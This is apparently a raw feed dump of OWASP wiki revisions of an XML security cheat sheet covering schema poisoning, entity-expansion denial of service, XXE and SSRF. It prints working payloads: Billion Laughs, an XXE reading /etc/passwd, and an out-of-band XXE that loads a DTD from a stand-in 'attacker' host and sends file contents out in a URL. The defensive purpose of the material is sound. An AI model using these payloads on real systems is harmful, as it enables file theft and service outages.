 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contain a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
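&lt;br /&gt;
A deployment check for this condition can be sketched in Python. The helper name &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; is hypothetical, and the sketch assumes a POSIX filesystem where the mode string has the same layout as the listing above:&lt;br /&gt;

```python
import os
import stat


def is_world_writable(path):
    """Return True when any user on the system may modify the file."""
    mode = os.stat(path).st_mode
    # stat.filemode renders the mode like ls does, e.g. "-rw-rw-rw-".
    # Index 8 is the write flag for users outside the owner and group.
    return stat.filemode(mode)[8] == "w"


# Example use against the schema from this section, if it exists locally.
if os.path.exists("note.dtd"):
    print("note.dtd world-writable:", is_world_writable("note.dtd"))
```

A schema that fails this check could be altered by any local user before the parser loads it.&lt;br /&gt;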
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by expanding the 10^9 (1,000,000,000) copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt; produced by this schema, about 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
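&lt;br /&gt;
The growth can be estimated with a short Python sketch. It assumes the layout shown above: nine nested levels, ten references per level, and a three-character base entity. The function names are hypothetical, and &amp;lt;tt&amp;gt;expand&amp;lt;/tt&amp;gt; should only be called with a small number of levels:&lt;br /&gt;

```python
def expanded_copies(levels, fanout=10):
    """Number of base-entity copies produced by the given nesting depth."""
    return fanout ** levels


def expand(levels, fanout=10, base="LOL"):
    """Build the expansion for real; only safe for small values of levels."""
    text = base
    for _ in range(levels):
        text = text * fanout
    return text


copies = expanded_copies(9)
print(copies, "copies,", copies * len("LOL"), "characters")
print(len(expand(3)), "characters after only three levels")
```

Each extra level multiplies the output by ten while adding a single short line to the document, which is why the attack is cheap to send and expensive to process.&lt;br /&gt;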
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which refers to the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt; and will be expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve resources such as a local file or a remote file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, and to perform port scanning or brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
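&lt;br /&gt;
The averaging step described above can be sketched in Python. This is only an illustration of the statistics involved: the function name &amp;lt;tt&amp;gt;rank_ports_by_mean_time&amp;lt;/tt&amp;gt; and the sample measurements are assumptions invented for this example, not data from a real test.&lt;br /&gt;

```python
from statistics import mean


def rank_ports_by_mean_time(samples):
    # samples maps a port number to a list of measured response times (seconds).
    averages = {port: mean(times) for port, times in samples.items()}
    # Ports are returned from the fastest to the slowest average response.
    return sorted(averages, key=averages.get)


# Hypothetical measurements, invented for illustration only.
measurements = {
    80: [0.021, 0.019, 0.023],
    81: [0.094, 0.101, 0.097],
}
print(rank_ports_by_mean_time(measurements))
```

Which end of the ranking corresponds to open ports depends on the implementation being tested, so the ordering alone does not decide the status of a port.&lt;br /&gt;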
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the user information component of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224431</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224431"/>
				<updated>2016-12-21T20:19:24Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
